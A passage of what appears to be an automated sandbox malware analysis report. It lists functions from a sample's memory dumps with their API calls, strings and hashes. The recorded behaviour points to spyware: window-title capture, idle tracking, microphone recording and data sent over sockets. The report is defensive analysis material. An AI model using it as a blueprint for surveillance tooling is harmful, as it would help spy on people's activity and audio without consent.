                                                                                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                                                                                    • Opcode ID: b6e783350524958a44aeb651753b1b3a84ba2c4ba6099ee85569b4bb5f7d78c3
                                                                                                                                                                                    • Instruction ID: f46c0f60b51905c4aab2f9b56c86983d65e8a61050c0204f9517f8e21a218a48
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6e783350524958a44aeb651753b1b3a84ba2c4ba6099ee85569b4bb5f7d78c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: EC41B47BB001176BDA14BFBACD9586DBE5AFB41140B804959D80347A45FF12BC24CBE3
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA4E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,15D14EF8,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E38
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E43
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4E4C
                                                                                                                                                                                    • closesocket.WS2_32(FFFFFFFF), ref: 15CA4E5A
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E91
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EA2
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EA9
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EBA
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4EBF
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4EC4
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4ED1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4ED6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3658366068-0
                                                                                                                                                                                    • Opcode ID: 07f0d98998297438ede45d09b541bfa7804bc54575399a1cf176c2654ab79711
                                                                                                                                                                                    • Instruction ID: 48edf2cae809fd76e334b84a18644457c58eda1fea2cfd711e401a4d3c4dc07d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07f0d98998297438ede45d09b541bfa7804bc54575399a1cf176c2654ab79711
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF213532110B119FDB21AF26CC89B5AFBA2FF40726F104E19E1E211AF0CB61B851DB94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03232530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                                                                                    • Opcode ID: 937481c05c83497b1f6866385cf2d65ec121bb1444a5ac4e6fda0e952e19a296
                                                                                                                                                                                    • Instruction ID: d0e7e94e96178d81f6817485cacaa8fdf0c250b678b93b46523cc12823550620
                                                                                                                                                                                    • Opcode Fuzzy Hash: 937481c05c83497b1f6866385cf2d65ec121bb1444a5ac4e6fda0e952e19a296
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A1C8B4A24358CBDB21DA2CCC84BD8B6F4EF0A750F1448E5D5499B386CBB589C9CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CAAD38
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 15CAAD43
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 15CAAD49
                                                                                                                                                                                    • GetWindowTextLengthW.USER32 ref: 15CAAD52
                                                                                                                                                                                    • GetWindowTextW.USER32 ref: 15CAAD86
                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 15CAAE54
                                                                                                                                                                                      • Part of subcall function 15CAA636: SetEvent.KERNEL32(00000000,?,00000000,15CAB20A,00000000), ref: 15CAA662
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                    • API String ID: 911427763-3954389425
                                                                                                                                                                                    • Opcode ID: b5bd0b3375e6fc4f2a8b3101d81bd07275b0756c13fac98b1024a4b455631b3a
                                                                                                                                                                                    • Instruction ID: c9a3e9c74d14c23dd2535159b9a2fe991d924d06c3007365cf317ae19f6841cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5bd0b3375e6fc4f2a8b3101d81bd07275b0756c13fac98b1024a4b455631b3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051B33B7082935BC314DF74DC94AAEBFA6BB84644F400D69E44682291FF64F945C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0324A058 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0324A078
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0324A08F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0324A095
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 0324A123
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0324A12F
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 0324A143
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LoadLibraryExA, xrefs: 0324A085
                                                                                                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 0324A08A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                                                                                                    • Opcode ID: 4354ee685d1c8946457e3f6145379bc749bf88bb123ff2c4022e17cb6df42e31
                                                                                                                                                                                    • Instruction ID: 8322d2f318e37c6f61e2f7becbe46aa4de25344f0a65f496975d59159b902e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4354ee685d1c8946457e3f6145379bc749bf88bb123ff2c4022e17cb6df42e31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 173134B56A0305BFDB24DF68CC85F5A77ACAF06794F045554FA18EB281D3B4E9808B60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CDA83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA892
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA89F
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA8A6
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA8D2
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA8DC
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA8E3
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,15CA1D55,?), ref: 15CDA926
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA930
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA937
                                                                                                                                                                                    • _free.LIBCMT ref: 15CDA943
                                                                                                                                                                                    • _free.LIBCMT ref: 15CDA94A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                                                    • Opcode ID: 8405a3c1b72ccf396948cbad433e69cdeff16dde29ce4a2dd3bfd619eeb97de0
                                                                                                                                                                                    • Instruction ID: 295e712791701f03fd4b1d67b3535d792428c8bc82d560f6a03ea382fb8e1bd2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8405a3c1b72ccf396948cbad433e69cdeff16dde29ce4a2dd3bfd619eeb97de0
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB31C07690434AAFCF019FA8CC44DAEBF78FF01664B110A59FA1096190DF70E951CBE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA54A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15CA54BF
                                                                                                                                                                                    • GetMessageA.USER32 ref: 15CA556F
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 15CA557E
                                                                                                                                                                                    • DispatchMessageA.USER32 ref: 15CA5589
                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,15D14F78), ref: 15CA5641
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 15CA5679
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                                                    • Opcode ID: a78af69b3764c997f4c3a3741755e65feef6d08bef392904529a7fbfa36e7689
                                                                                                                                                                                    • Instruction ID: 58346b1051667aa4061c85107bc1fde6d9bdc2e2220a5b2c4e50db6c91b57fae
                                                                                                                                                                                    • Opcode Fuzzy Hash: a78af69b3764c997f4c3a3741755e65feef6d08bef392904529a7fbfa36e7689
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74419F7BB042129BCB14EE74CC988AF7BA9ABC5650F404D1DE55283294FF34B909C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 03232690
                                                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 03232707
                                                                                                                                                                                    • , xrefs: 03232814
                                                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 03232849
                                                                                                                                                                                    • Unexpected Memory Leak, xrefs: 032328C0
                                                                                                                                                                                    • bytes: , xrefs: 0323275D
                                                                                                                                                                                    • 7, xrefs: 032326A1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                                                    • Opcode ID: 74402cc52959f6e07a5ada1bce184761fc6dbd010fb76adee82950dafd00ef55
                                                                                                                                                                                    • Instruction ID: c91abde8681696672326e3152503ff83850f808e2ae97d14b1a73256d8c51a8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74402cc52959f6e07a5ada1bce184761fc6dbd010fb76adee82950dafd00ef55
                                                                                                                                                                                    • Instruction Fuzzy Hash: B571B6B4A24398CFDB21DA2CCC84BD8B6F5EB0A710F1448E5D549DB281DBB58AC5CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF5F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,15CF6FFF), ref: 15CF5F27
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                    • Opcode ID: 5fc56d8a8df4de84f70df57bd9cf20f732c12a36080f20de930ff11a2461367f
                                                                                                                                                                                    • Instruction ID: 8584043a214de37bea2e2c6115f78886d595bcd9ce72a33578f28b0c3c1bc79f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fc56d8a8df4de84f70df57bd9cf20f732c12a36080f20de930ff11a2461367f
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB515C7590461EEBCF40DFA5E9885ECBFB0FF49300FA14986D482A7264CB329964CB19
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323BD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,0323C047,?,?,00000000,00000000), ref: 0323BDB2
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                                    • Opcode ID: 5d8b534e685be14b0e01383fb056ecc5010afd1d68432406941435595a9dc355
                                                                                                                                                                                    • Instruction ID: d5735ba19ff0a6a95c1df6149918bef177cf5008316ee4eceaaaa716219fc036
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8b534e685be14b0e01383fb056ecc5010afd1d68432406941435595a9dc355
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D6159B87203899BDB04FBB5EC806DE77BAEB4A200F109475E101EF745CA75DD868790
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAA726 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 15CAA740
                                                                                                                                                                                      • Part of subcall function 15CAA675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 15CAA6AB
                                                                                                                                                                                      • Part of subcall function 15CAA675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,15CAA74D), ref: 15CAA6BA
                                                                                                                                                                                      • Part of subcall function 15CAA675: Sleep.KERNEL32(00002710,?,?,?,15CAA74D), ref: 15CAA6E7
                                                                                                                                                                                      • Part of subcall function 15CAA675: CloseHandle.KERNEL32(00000000), ref: 15CAA6EE
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 15CAA77C
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 15CAA78D
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 15CAA7A4
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 15CAA81E
                                                                                                                                                                                      • Part of subcall function 15CBC485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,15D06468,00000000,00000000,00000000), ref: 15CAA927
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                    • String ID: `h1
                                                                                                                                                                                    • API String ID: 3795512280-1265431463
                                                                                                                                                                                    • Opcode ID: 354afe71b3d53298a6bf06db6c645a0895872f4c71db31da394e750746e52275
                                                                                                                                                                                    • Instruction ID: d2d9aaa7cffeb279e64b3fb7b58a29ecb5c7f5c4556dc3121b6861a2737544c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 354afe71b3d53298a6bf06db6c645a0895872f4c71db31da394e750746e52275
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2151707B7082565ACB09AF74CCA4ABE7BAA9FC0284F400C1DE543971D0FF64B949C752
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA7963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 15CA79C5
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 15CA7A0D
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA7A4D
                                                                                                                                                                                    • MoveFileW.KERNEL32 ref: 15CA7A6A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA7A95
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 15CA7AA5
                                                                                                                                                                                      • Part of subcall function 15CA4B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,15D14EF8,15CA4C49,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4BA5
                                                                                                                                                                                      • Part of subcall function 15CA4B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,15CA548B), ref: 15CA4BC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                    • String ID: .part
                                                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                                                    • Opcode ID: d62706c7b69e5dfda6b3a35d1603ff9f96e411a809774b2549d9a97083ee0706
                                                                                                                                                                                    • Instruction ID: 7f6e769fda7ad0f31e53a9567c4a73c377962a32563e76ece31f3fcebc6830c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d62706c7b69e5dfda6b3a35d1603ff9f96e411a809774b2549d9a97083ee0706
                                                                                                                                                                                    • Instruction Fuzzy Hash: C131783A608352AFC710DE60C8949DEBBE8FB84654F004E1AB58692150FF70BA08CB96
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA1D0B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strftime.LIBCMT ref: 15CA1D50
                                                                                                                                                                                      • Part of subcall function 15CA1A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15CA1AD9
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(15D12A88,00000020,00000000), ref: 15CA1E02
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(15D12A88,00000020), ref: 15CA1E40
                                                                                                                                                                                    • waveInAddBuffer.WINMM(15D12A88,00000020), ref: 15CA1E4F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
